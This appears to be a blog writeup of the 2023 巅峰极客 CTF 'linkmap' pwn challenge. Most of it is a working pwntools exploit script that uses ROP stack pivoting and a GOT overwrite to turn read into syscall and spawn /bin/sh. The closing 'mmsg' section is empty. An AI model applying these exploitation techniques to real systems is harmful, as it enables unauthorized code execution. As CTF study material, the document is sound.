---
title: 2023 巅峰极客 pwn Writeup
date: 2023-07-29 21:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=68/
pin: false
published:
---



## linkmap

这题存在这样一段gadget，可以把我们提供地址的内容(rbp-8)放置到bss段(0x601020+rax)上，这里的思路是将read_got放置在bss段上，然后将其修改为syscall，然后通过read控制rax实现system调用

![image-20230730135803607](https://e4l4pic.oss-cn-beijing.aliyuncs.com/image-20230730135803607.png)



```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("","")
p = process("./ezzzz")
elf = ELF("./ezzzz")
libc = elf.libc
context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']

def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------


pop_rdi = 0x00000000004007e3
pop_rsi_r15 = 0x00000000004007e1
pop_rbp = 0x0000000000400570
leave_ret = 0x40076D
read_plt = elf.plt['read']
read_got = elf.got['read']
bss = 0x602000
magic = 0x000000000040066b # lea rdx, [rax + 0x601020]; mov rax, qword ptr [rbp - 8]; mov qword ptr [rdx], rax; nop; pop rbp; ret; 
# 0x601120 读入100字节
# 0x601020 读入0字节

# 栈迁移  pop_rbp+leave_ret 跳转到rbp+8的地址执行
pay = p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(0x601f00)+p64(0)+p64(read_plt)
pay +=p64(pop_rdi)+p64(0x601f00)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rbp)+p64(read_got + 8)+p64(magic)+p64(0x601f00+0x20)+p64(leave_ret)
s((cyclic(0x18)+pay).ljust(0x100,'\x00'))

# 修改0x601120上记录的read_got_addr的低字节
pay = p64(0x601800)+p64(magic)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(0x601120-(59-1))+p64(0)+p64(read_plt)
pay += p64(pop_rdi)+p64(0x601f00)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rbp)+p64(0x601118)+p64(0x400772)
s('/bin/sh'.ljust(0x20, '\x00') + pay.ljust(0x100-0x20, '\x00'))

s(cyclic(59-1) + '\x90')

ia()
```

## mmsg

